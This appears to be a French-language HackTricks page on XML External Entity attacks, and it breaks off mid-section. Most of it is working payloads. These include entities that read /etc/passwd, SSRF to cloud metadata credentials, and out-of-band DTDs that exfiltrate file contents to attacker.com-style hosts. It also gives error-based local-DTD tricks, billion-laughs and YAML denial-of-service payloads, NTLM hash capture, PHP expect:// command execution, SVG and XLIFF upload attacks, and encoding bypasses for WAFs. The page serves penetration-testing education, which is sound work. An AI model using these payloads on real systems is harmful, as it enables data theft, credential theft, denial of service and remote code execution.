XXE - XEE - XML External Entity

Reading time: 29 minutes

tip

Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE)

Soutenir HackTricks

XML Basics

XML est un langage de balisage conçu pour le stockage et le transport de données, avec une structure flexible qui permet l'utilisation de balises nommées de maniÚre descriptive. Il diffÚre de HTML en n'étant pas limité à un ensemble de balises prédéfinies. L'importance de XML a diminué avec l'essor de JSON, malgré son rÎle initial dans la technologie AJAX.

  • ReprĂ©sentation des donnĂ©es par des entitĂ©s : Les entitĂ©s dans XML permettent la reprĂ©sentation des donnĂ©es, y compris des caractĂšres spĂ©ciaux comme &lt; et &gt;, qui correspondent Ă  < et > pour Ă©viter les conflits avec le systĂšme de balises XML.
  • DĂ©finition des Ă©lĂ©ments XML : XML permet de dĂ©finir des types d'Ă©lĂ©ments, dĂ©crivant comment les Ă©lĂ©ments doivent ĂȘtre structurĂ©s et quel contenu ils peuvent contenir, allant de tout type de contenu Ă  des Ă©lĂ©ments enfants spĂ©cifiques.
  • DĂ©finition de type de document (DTD) : Les DTD sont cruciaux dans XML pour dĂ©finir la structure du document et les types de donnĂ©es qu'il peut contenir. Ils peuvent ĂȘtre internes, externes ou une combinaison, guidant la façon dont les documents sont formatĂ©s et validĂ©s.
  • EntitĂ©s personnalisĂ©es et externes : XML prend en charge la crĂ©ation d'entitĂ©s personnalisĂ©es au sein d'un DTD pour une reprĂ©sentation flexible des donnĂ©es. Les entitĂ©s externes, dĂ©finies avec une URL, soulĂšvent des prĂ©occupations de sĂ©curitĂ©, en particulier dans le contexte des attaques XML External Entity (XXE), qui exploitent la façon dont les analyseurs XML gĂšrent les sources de donnĂ©es externes : <!DOCTYPE foo [ <!ENTITY myentity "value" > ]>
  • DĂ©tection XXE avec des entitĂ©s de paramĂštre : Pour dĂ©tecter les vulnĂ©rabilitĂ©s XXE, surtout lorsque les mĂ©thodes conventionnelles Ă©chouent en raison des mesures de sĂ©curitĂ© des analyseurs, des entitĂ©s de paramĂštre XML peuvent ĂȘtre utilisĂ©es. Ces entitĂ©s permettent des techniques de dĂ©tection hors bande, telles que le dĂ©clenchement de requĂȘtes DNS ou HTTP vers un domaine contrĂŽlĂ©, pour confirmer la vulnĂ©rabilitĂ©.
  • <!DOCTYPE foo [ <!ENTITY ext SYSTEM "file:///etc/passwd" > ]>
  • <!DOCTYPE foo [ <!ENTITY ext SYSTEM "http://attacker.com" > ]>

Main attacks

La plupart de ces attaques ont été testées en utilisant les incroyables laboratoires XEE de Portswiggers : https://portswigger.net/web-security/xxe

New Entity test

Dans cette attaque, je vais tester si une simple dĂ©claration de nouvelle ENTITÉ fonctionne.

xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY toreplace "3"> ]>
<stockCheck>
<productId>&toreplace;</productId>
<storeId>1</storeId>
</stockCheck>

Lire le fichier

Essayons de lire /etc/passwd de différentes maniÚres. Pour Windows, vous pourriez essayer de lire : C:\windows\system32\drivers\etc\hosts

Dans ce premier cas, notez que SYSTEM "**file:///**etc/passwd" fonctionnera Ă©galement.

xml
<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]>
<data>&example;</data>

Ce deuxiĂšme cas devrait ĂȘtre utile pour extraire un fichier si le serveur web utilise PHP (Ce n'est pas le cas des laboratoires Portswigger)

xml
<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY example SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> ]>
<data>&example;</data>

Dans ce troisiÚme cas, remarquez que nous déclarons l'Element stockCheck comme ANY.

xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ELEMENT stockCheck ANY>
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<stockCheck>
<productId>&file;</productId>
<storeId>1</storeId>
</stockCheck3>

Listing de répertoire

Dans les applications basĂ©es sur Java, il peut ĂȘtre possible de lister le contenu d'un rĂ©pertoire via XXE avec un payload comme (demander simplement le rĂ©pertoire au lieu du fichier) :

xml
<!-- Root / -->
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE aa[<!ELEMENT bb ANY><!ENTITY xxe SYSTEM "file:///">]><root><foo>&xxe;</foo></root>

<!-- /etc/ -->
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root[<!ENTITY xxe SYSTEM "file:///etc/" >]><root><foo>&xxe;</foo></root>

SSRF

Une XXE pourrait ĂȘtre utilisĂ©e pour abuser d'un SSRF Ă  l'intĂ©rieur d'un cloud.

xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>

Blind SSRF

En utilisant la technique prĂ©cĂ©demment commentĂ©e, vous pouvez amener le serveur Ă  accĂ©der Ă  un serveur que vous contrĂŽlez pour montrer qu'il est vulnĂ©rable. Mais, si cela ne fonctionne pas, c'est peut-ĂȘtre parce que les entitĂ©s XML ne sont pas autorisĂ©es, dans ce cas, vous pourriez essayer d'utiliser les entitĂ©s de paramĂštres XML :

xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY % xxe SYSTEM "http://gtd8nhwxylcik0mt2dgvpeapkgq7ew.burpcollaborator.net"> %xxe; ]>
<stockCheck><productId>3;</productId><storeId>1</storeId></stockCheck>

"Blind" SSRF - Exfiltrer des données hors bande

Dans ce cas, nous allons faire en sorte que le serveur charge un nouveau DTD avec un payload malveillant qui enverra le contenu d'un fichier via une requĂȘte HTTP (pour les fichiers multi-lignes, vous pourriez essayer de les exfiltrer via _ftp://_ en utilisant ce serveur de base par exemple xxe-ftp-server.rb). Cette explication est basĂ©e sur Portswiggers lab ici.

Dans le DTD malveillant donné, une série d'étapes sont effectuées pour exfiltrer des données :

Exemple de DTD malveillant :

La structure est la suivante :

xml
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>">
%eval;
%exfiltrate;

Les étapes exécutées par ce DTD incluent :

  1. Définition des entités de paramÚtre :
  • Une entitĂ© de paramĂštre XML, %file, est crĂ©Ă©e, lisant le contenu du fichier /etc/hostname.
  • Une autre entitĂ© de paramĂštre XML, %eval, est dĂ©finie. Elle dĂ©clare dynamiquement une nouvelle entitĂ© de paramĂštre XML, %exfiltrate. L'entitĂ© %exfiltrate est configurĂ©e pour effectuer une requĂȘte HTTP vers le serveur de l'attaquant, passant le contenu de l'entitĂ© %file dans la chaĂźne de requĂȘte de l'URL.
  1. Exécution des entités :
  • L'entitĂ© %eval est utilisĂ©e, entraĂźnant l'exĂ©cution de la dĂ©claration dynamique de l'entitĂ© %exfiltrate.
  • L'entitĂ© %exfiltrate est ensuite utilisĂ©e, dĂ©clenchant une requĂȘte HTTP vers l'URL spĂ©cifiĂ©e avec le contenu du fichier.

L'attaquant héberge ce DTD malveillant sur un serveur sous son contrÎle, généralement à une URL comme http://web-attacker.com/malicious.dtd.

Charge utile XXE : Pour exploiter une application vulnérable, l'attaquant envoie une charge utile XXE :

xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://web-attacker.com/malicious.dtd"> %xxe;]>
<stockCheck><productId>3;</productId><storeId>1</storeId></stockCheck>

Ce payload définit une entité de paramÚtre XML %xxe et l'incorpore dans le DTD. Lorsqu'il est traité par un parseur XML, ce payload récupÚre le DTD externe depuis le serveur de l'attaquant. Le parseur interprÚte ensuite le DTD en ligne, exécutant les étapes décrites dans le DTD malveillant et conduisant à l'exfiltration du fichier /etc/hostname vers le serveur de l'attaquant.

Basé sur l'erreur (DTD externe)

Dans ce cas, nous allons faire en sorte que le serveur charge un DTD malveillant qui affichera le contenu d'un fichier dans un message d'erreur (cela n'est valide que si vous pouvez voir les messages d'erreur). Exemple ici.

Un message d'erreur de parsing XML, rĂ©vĂ©lant le contenu du fichier /etc/passwd, peut ĂȘtre dĂ©clenchĂ© en utilisant un Document Type Definition (DTD) externe malveillant. Cela est accompli par les Ă©tapes suivantes :

  1. Une entité de paramÚtre XML nommée file est définie, contenant le contenu du fichier /etc/passwd.
  2. Une entité de paramÚtre XML nommée eval est définie, incorporant une déclaration dynamique pour une autre entité de paramÚtre XML nommée error. Cette entité error, lorsqu'elle est évaluée, tente de charger un fichier inexistant, incorporant le contenu de l'entité file comme son nom.
  3. L'entité eval est invoquée, conduisant à la déclaration dynamique de l'entité error.
  4. L'invocation de l'entité error entraßne une tentative de chargement d'un fichier inexistant, produisant un message d'erreur qui inclut le contenu du fichier /etc/passwd comme partie du nom de fichier.

Le DTD externe malveillant peut ĂȘtre invoquĂ© avec le XML suivant :

xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://web-attacker.com/malicious.dtd"> %xxe;]>
<stockCheck><productId>3;</productId><storeId>1</storeId></stockCheck>

Lors de l'exécution, la réponse du serveur web devrait inclure un message d'erreur affichant le contenu du fichier /etc/passwd.

Veuillez noter que le DTD externe nous permet d'inclure une entité à l'intérieur de la seconde (**eval**), mais cela est interdit dans le DTD interne. Par conséquent, vous ne pouvez pas forcer une erreur sans utiliser un DTD externe (généralement).

Basé sur l'erreur (DTD systÚme)

Alors, que dire des vulnérabilités XXE aveugles lorsque les interactions hors bande sont bloquées (les connexions externes ne sont pas disponibles) ?

Une faille dans la spécification du langage XML peut exposer des données sensibles à travers des messages d'erreur lorsque le DTD d'un document mélange des déclarations internes et externes. Ce problÚme permet la redéfinition interne d'entités déclarées externement, facilitant l'exécution d'attaques XXE basées sur des erreurs. De telles attaques exploitent la redéfinition d'une entité de paramÚtre XML, initialement déclarée dans un DTD externe, depuis un DTD interne. Lorsque les connexions hors bande sont bloquées par le serveur, les attaquants doivent s'appuyer sur des fichiers DTD locaux pour mener l'attaque, visant à induire une erreur de parsing pour révéler des informations sensibles.

ConsidĂ©rez un scĂ©nario oĂč le systĂšme de fichiers du serveur contient un fichier DTD Ă  /usr/local/app/schema.dtd, dĂ©finissant une entitĂ© nommĂ©e custom_entity. Un attaquant peut induire une erreur de parsing XML rĂ©vĂ©lant le contenu du fichier /etc/passwd en soumettant un DTD hybride comme suit :

xml
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/local/app/schema.dtd">
<!ENTITY % custom_entity '
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file'>">
%eval;
%error;
'>
%local_dtd;
]>

Les étapes décrites sont exécutées par ce DTD :

  • La dĂ©finition d'une entitĂ© de paramĂštre XML nommĂ©e local_dtd inclut le fichier DTD externe situĂ© sur le systĂšme de fichiers du serveur.
  • Une redĂ©finition se produit pour l'entitĂ© de paramĂštre XML custom_entity, initialement dĂ©finie dans le DTD externe, pour encapsuler un exploit XXE basĂ© sur les erreurs. Cette redĂ©finition est conçue pour provoquer une erreur de parsing, exposant le contenu du fichier /etc/passwd.
  • En utilisant l'entitĂ© local_dtd, le DTD externe est engagĂ©, englobant la nouvelle entitĂ© dĂ©finie custom_entity. Cette sĂ©quence d'actions entraĂźne l'Ă©mission du message d'erreur visĂ© par l'exploit.

Exemple du monde réel : Les systÚmes utilisant l'environnement de bureau GNOME ont souvent un DTD à /usr/share/yelp/dtd/docbookx.dtd contenant une entité appelée ISOamso.

xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
'>
%local_dtd;
]>
<stockCheck><productId>3;</productId><storeId>1</storeId></stockCheck>

Comme cette technique utilise un DTD interne, vous devez d'abord en trouver un valide. Vous pourriez le faire en installant le mĂȘme OS / logiciel que celui utilisĂ© par le serveur et en cherchant quelques DTD par dĂ©faut, ou en rĂ©cupĂ©rant une liste de DTDs par dĂ©faut dans les systĂšmes et en vĂ©rifiant si l'un d'eux existe :

xml
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
%local_dtd;
]>

Pour plus d'informations, consultez https://portswigger.net/web-security/xxe/blind

Trouver des DTD dans le systĂšme

Dans le superbe dĂ©pĂŽt github suivant, vous pouvez trouver des chemins de DTD qui peuvent ĂȘtre prĂ©sents dans le systĂšme :

dtd-finder/list at master \xc2\xb7 GoSecure/dtd-finder \xc2\xb7 GitHub

De plus, si vous avez l'image Docker du systĂšme victime, vous pouvez utiliser l'outil du mĂȘme dĂ©pĂŽt pour scanner l'image et trouver le chemin des DTD prĂ©sents dans le systĂšme. Lisez le Readme du github pour apprendre comment.

bash
java -jar dtd-finder-1.2-SNAPSHOT-all.jar /tmp/dadocker.tar

Scanning TAR file /tmp/dadocker.tar

[=] Found a DTD: /tomcat/lib/jsp-api.jar!/jakarta/servlet/jsp/resources/jspxml.dtd
Testing 0 entities : []

[=] Found a DTD: /tomcat/lib/servlet-api.jar!/jakarta/servlet/resources/XMLSchema.dtd
Testing 0 entities : []

XXE via Office Open XML Parsers

Pour une explication plus approfondie de cette attaque, consultez la deuxiĂšme section de ce post incroyable de Detectify.

La capacité de télécharger des documents Microsoft Office est offerte par de nombreuses applications web, qui procÚdent ensuite à l'extraction de certains détails de ces documents. Par exemple, une application web peut permettre aux utilisateurs d'importer des données en téléchargeant un tableau au format XLSX. Pour que le parseur puisse extraire les données du tableau, il devra inévitablement analyser au moins un fichier XML.

Pour tester cette vulnĂ©rabilitĂ©, il est nĂ©cessaire de crĂ©er un fichier Microsoft Office contenant un payload XXE. La premiĂšre Ă©tape consiste Ă  crĂ©er un rĂ©pertoire vide dans lequel le document peut ĂȘtre dĂ©compressĂ©.

Une fois le document dĂ©compressĂ©, le fichier XML situĂ© Ă  ./unzipped/word/document.xml doit ĂȘtre ouvert et modifiĂ© dans un Ă©diteur de texte prĂ©fĂ©rĂ© (comme vim). Le XML doit ĂȘtre modifiĂ© pour inclure le payload XXE souhaitĂ©, commençant souvent par une requĂȘte HTTP.

Les lignes XML modifiĂ©es doivent ĂȘtre insĂ©rĂ©es entre les deux objets XML racines. Il est important de remplacer l'URL par une URL surveillable pour les requĂȘtes.

Enfin, le fichier peut ĂȘtre compressĂ© pour crĂ©er le fichier malveillant poc.docx. À partir du rĂ©pertoire "unzipped" prĂ©cĂ©demment crĂ©Ă©, la commande suivante doit ĂȘtre exĂ©cutĂ©e :

Maintenant, le fichier crĂ©Ă© peut ĂȘtre tĂ©lĂ©chargĂ© sur l'application web potentiellement vulnĂ©rable, et on peut espĂ©rer qu'une requĂȘte apparaisse dans les journaux de Burp Collaborator.

Jar: protocol

Le jar protocol est accessible exclusivement au sein des applications Java. Il est conçu pour permettre l'accÚs aux fichiers dans une archive PKZIP (par exemple, .zip, .jar, etc.), s'adressant à la fois aux fichiers locaux et distants.

jar:file:///var/myarchive.zip!/file.txt
jar:https://download.host.com/myarchive.zip!/file.txt

caution

Pour pouvoir accéder aux fichiers à l'intérieur des fichiers PKZIP, c'est super utile pour abuser de XXE via des fichiers DTD systÚme. Consultez cette section pour apprendre à abuser des fichiers DTD systÚme.

Le processus pour accéder à un fichier dans une archive PKZIP via le protocole jar implique plusieurs étapes :

  1. Une requĂȘte HTTP est faite pour tĂ©lĂ©charger l'archive zip depuis un emplacement spĂ©cifiĂ©, tel que https://download.website.com/archive.zip.
  2. La réponse HTTP contenant l'archive est stockée temporairement sur le systÚme, généralement dans un emplacement comme /tmp/....
  3. L'archive est ensuite extraite pour accéder à son contenu.
  4. Le fichier spécifique dans l'archive, file.zip, est lu.
  5. AprÚs l'opération, tous les fichiers temporaires créés pendant ce processus sont supprimés.

Une technique intĂ©ressante pour interrompre ce processus Ă  la deuxiĂšme Ă©tape consiste Ă  maintenir la connexion serveur ouverte indĂ©finiment lors de la fourniture du fichier d'archive. Des outils disponibles dans ce dĂ©pĂŽt peuvent ĂȘtre utilisĂ©s Ă  cet effet, y compris un serveur Python (slow_http_server.py) et un serveur Java (slowserver.jar).

xml
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "jar:http://attacker.com:8080/evil.zip!/evil.dtd">]>
<foo>&xxe;</foo>

caution

Écrire des fichiers dans un rĂ©pertoire temporaire peut aider Ă  escalader une autre vulnĂ©rabilitĂ© qui implique un parcours de chemin (comme l'inclusion de fichiers locaux, l'injection de modĂšles, RCE XSLT, dĂ©sĂ©rialisation, etc).

XSS

xml
<![CDATA[<]]>script<![CDATA[>]]>alert(1)<![CDATA[<]]>/script<![CDATA[>]]>

DoS

Attaque des Milliards de Rires

xml
<!DOCTYPE data [
<!ENTITY a0 "dos" >
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
]>
<data>&a4;</data>

Attaque Yaml

xml
a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]

Attaque de Blowup Quadratique

Obtention de NTML

Sur les hĂŽtes Windows, il est possible d'obtenir le hash NTML de l'utilisateur du serveur web en configurant un gestionnaire responder.py :

bash
Responder.py -I eth0 -v

et en envoyant la requĂȘte suivante

xml
<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY example SYSTEM 'file://///attackerIp//randomDir/random.jpg'> ]>
<data>&example;</data>

Puis vous pouvez essayer de cracker le hash en utilisant hashcat

Surfaces XXE Cachées

XInclude

Lors de l'intĂ©gration des donnĂ©es client dans des documents XML cĂŽtĂ© serveur, comme ceux des requĂȘtes SOAP en backend, le contrĂŽle direct sur la structure XML est souvent limitĂ©, entravant les attaques XXE traditionnelles en raison des restrictions sur la modification de l'Ă©lĂ©ment DOCTYPE. Cependant, une attaque XInclude offre une solution en permettant l'insertion d'entitĂ©s externes dans n'importe quel Ă©lĂ©ment de donnĂ©es du document XML. Cette mĂ©thode est efficace mĂȘme lorsque seule une partie des donnĂ©es d'un document XML gĂ©nĂ©rĂ© par le serveur peut ĂȘtre contrĂŽlĂ©e.

Pour exĂ©cuter une attaque XInclude, l'espace de noms XInclude doit ĂȘtre dĂ©clarĂ©, et le chemin du fichier pour l'entitĂ© externe souhaitĂ©e doit ĂȘtre spĂ©cifiĂ©. Ci-dessous se trouve un exemple succinct de la façon dont une telle attaque peut ĂȘtre formulĂ©e :

xml
productId=<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>&storeId=1

VĂ©rifiez https://portswigger.net/web-security/xxe pour plus d'infos !

SVG - Téléchargement de fichiers

Les fichiers téléchargés par les utilisateurs vers certaines applications, qui sont ensuite traités sur le serveur, peuvent exploiter des vulnérabilités dans la maniÚre dont les fichiers XML ou les formats de fichiers contenant XML sont gérés. Des formats de fichiers courants comme les documents bureautiques (DOCX) et les images (SVG) sont basés sur XML.

Lorsque les utilisateurs tĂ©lĂ©chargent des images, ces images sont traitĂ©es ou validĂ©es cĂŽtĂ© serveur. MĂȘme pour les applications s'attendant Ă  des formats tels que PNG ou JPEG, la bibliothĂšque de traitement d'images du serveur peut Ă©galement prendre en charge les images SVG. SVG, Ă©tant un format basĂ© sur XML, peut ĂȘtre exploitĂ© par des attaquants pour soumettre des images SVG malveillantes, exposant ainsi le serveur Ă  des vulnĂ©rabilitĂ©s XXE (XML External Entity).

Un exemple d'un tel exploit est montrĂ© ci-dessous, oĂč une image SVG malveillante tente de lire des fichiers systĂšme :

xml
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200"><image xlink:href="file:///etc/hostname"></image></svg>

Une autre méthode consiste à exécuter des commandes via le wrapper PHP "expect" :

xml
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
<image xlink:href="expect://ls"></image>
</svg>

Dans les deux cas, le format SVG est utilisé pour lancer des attaques qui exploitent les capacités de traitement XML du logiciel du serveur, soulignant la nécessité d'une validation des entrées robuste et de mesures de sécurité.

VĂ©rifiez https://portswigger.net/web-security/xxe pour plus d'infos !

Notez que la premiĂšre ligne du fichier lu ou du rĂ©sultat de l'exĂ©cution apparaĂźtra DANS l'image crĂ©Ă©e. Vous devez donc ĂȘtre en mesure d'accĂ©der Ă  l'image que SVG a crĂ©Ă©e.

PDF - Téléchargement de fichier

Lisez le post suivant pour apprendre à exploiter un XXE en téléchargeant un fichier PDF :

PDF Upload - XXE and CORS bypass

Content-Type : De x-www-urlencoded Ă  XML

Si une requĂȘte POST accepte les donnĂ©es au format XML, vous pourriez essayer d'exploiter un XXE dans cette requĂȘte. Par exemple, si une requĂȘte normale contient ce qui suit :

xml
POST /action HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 7

foo=bar

Alors vous pourriez ĂȘtre en mesure de soumettre la requĂȘte suivante, avec le mĂȘme rĂ©sultat :

xml
POST /action HTTP/1.0
Content-Type: text/xml
Content-Length: 52

<?xml version="1.0" encoding="UTF-8"?><foo>bar</foo>

Content-Type : De JSON Ă  XEE

Pour modifier la requĂȘte, vous pouvez utiliser une extension Burp nommĂ©e “Content Type Converter“. Here you can find this example:

xml
Content-Type: application/json;charset=UTF-8

{"root": {"root": {
"firstName": "Avinash",
"lastName": "",
"country": "United States",
"city": "ddd",
"postalCode": "ddd"
}}}
xml
Content-Type: application/xml;charset=UTF-8

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE testingxxe [<!ENTITY xxe SYSTEM "http://34.229.92.127:8000/TEST.ext" >]>
<root>
<root>
<firstName>&xxe;</firstName>
<lastName/>
<country>United States</country>
<city>ddd</city>
<postalCode>ddd</postalCode>
</root>
</root>

Un autre exemple peut ĂȘtre trouvĂ© ici.

Bypasses de WAF et protections

Base64

xml
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>

Cela ne fonctionne que si le serveur XML accepte le protocole data://.

UTF-7

Vous pouvez utiliser la ["Encode Recipe" de cyberchef ici ]([https://gchq.github.io/CyberChef/index.html#recipe=Encode_text%28'UTF-7 %2865000%29'%29&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4)to](https://gchq.github.io/CyberChef/index.html#recipe=Encode_text%28'UTF-7 %2865000%29'%29&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4%29to) pour transformer en UTF-7.

xml
<!xml version="1.0" encoding="UTF-7"?-->
+ADw-+ACE-DOCTYPE+ACA-foo+ACA-+AFs-+ADw-+ACE-ENTITY+ACA-example+ACA-SYSTEM+ACA-+ACI-/etc/passwd+ACI-+AD4-+ACA-+AF0-+AD4-+AAo-+ADw-stockCheck+AD4-+ADw-productId+AD4-+ACY-example+ADs-+ADw-/productId+AD4-+ADw-storeId+AD4-1+ADw-/storeId+AD4-+ADw-/stockCheck+AD4-
xml
<?xml version="1.0" encoding="UTF-7"?>
+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4
+ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4

File:/ Bypass de protocole

Si le web utilise PHP, au lieu d'utiliser file:/, vous pouvez utiliser php wrappers php://filter/convert.base64-encode/resource= pour accéder aux fichiers internes.

Si le web utilise Java, vous pouvez vérifier le jar: protocole.

Entités HTML

Astuce de https://github.com/Ambrotd/XXE-Notes
Vous pouvez créer une entité à l'intérieur d'une entité en l'encoding avec entités html et ensuite l'appeler pour charger un dtd.
Notez que les entitĂ©s HTML utilisĂ©es doivent ĂȘtre numĂ©riques (comme [dans cet exemple](https://gchq.github.io/CyberChef/index.html#recipe=To_HTML_Entity%28true,'Numeric entities'%29&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B)\).

xml
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % a "<&#x21;&#x45;&#x4E;&#x54;&#x49;&#x54;&#x59;&#x25;&#x64;&#x74;&#x64;&#x53;&#x59;&#x53;&#x54;&#x45;&#x4D;&#x22;&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x6F;&#x75;&#x72;&#x73;&#x65;&#x72;&#x76;&#x65;&#x72;&#x2E;&#x63;&#x6F;&#x6D;&#x2F;&#x62;&#x79;&#x70;&#x61;&#x73;&#x73;&#x2E;&#x64;&#x74;&#x64;&#x22;&#x3E;" >%a;%dtd;]>
<data>
<env>&exfil;</env>
</data>

Exemple de DTD :

xml
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/flag">
<!ENTITY % abt "<!ENTITY exfil SYSTEM 'http://172.17.0.1:7878/bypass.xml?%data;'>">
%abt;
%exfil;

PHP Wrappers

Base64

Extraire index.php

xml
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>

Extraire une ressource externe

xml
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=http://10.0.0.3"> ]>

Exécution de code à distance

Si le module "expect" de PHP est chargé

xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<creds>
<user>&xxe;</user>
<pass>mypass</pass>
</creds>

SOAP - XEE

xml
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>

XLIFF - XXE

Cet exemple est inspiré de https://pwn.vg/articles/2021-06/local-file-read-via-error-based-xxe

XLIFF (XML Localization Interchange File Format) est utilisé pour standardiser l'échange de données dans les processus de localisation. C'est un format basé sur XML principalement utilisé pour transférer des données localisables entre des outils lors de la localisation et comme format d'échange commun pour les outils de CAT (Computer-Aided Translation).

Analyse de la demande aveugle

Une demande est faite au serveur avec le contenu suivant :

xml
------WebKitFormBoundaryqBdAsEtYaBjTArl3
Content-Disposition: form-data; name="file"; filename="xxe.xliff"
Content-Type: application/x-xliff+xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE XXE [
<!ENTITY % remote SYSTEM "http://redacted.burpcollaborator.net/?xxe_test"> %remote; ]>
<xliff srcLang="en" trgLang="ms-MY" version="2.0"></xliff>
------WebKitFormBoundaryqBdAsEtYaBjTArl3--

Cependant, cette requĂȘte dĂ©clenche une erreur de serveur interne, mentionnant spĂ©cifiquement un problĂšme avec les dĂ©clarations de balisage :

json
{
"status": 500,
"error": "Internal Server Error",
"message": "Error systemId: http://redacted.burpcollaborator.net/?xxe_test; The markup declarations contained or pointed to by the document type declaration must be well-formed."
}

Malgré l'erreur, un hit est enregistré sur Burp Collaborator, indiquant un certain niveau d'interaction avec l'entité externe.

Exfiltration de donnĂ©es hors bande Pour exfiltrer des donnĂ©es, une requĂȘte modifiĂ©e est envoyĂ©e :

------WebKitFormBoundaryqBdAsEtYaBjTArl3
Content-Disposition: form-data; name="file"; filename="xxe.xliff"
Content-Type: application/x-xliff+xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE XXE [
<!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd"> %remote; ]>
<xliff srcLang="en" trgLang="ms-MY" version="2.0"></xliff>
------WebKitFormBoundaryqBdAsEtYaBjTArl3--

Cette approche révÚle que l'Agent Utilisateur indique l'utilisation de Java 1.8. Une limitation notée avec cette version de Java est l'incapacité à récupérer des fichiers contenant un caractÚre de nouvelle ligne, tel que /etc/passwd, en utilisant la technique Out of Band.

Exfiltration de données basée sur les erreurs Pour surmonter cette limitation, une approche basée sur les erreurs est employée. Le fichier DTD est structuré comme suit pour déclencher une erreur qui inclut des données d'un fichier cible :

xml
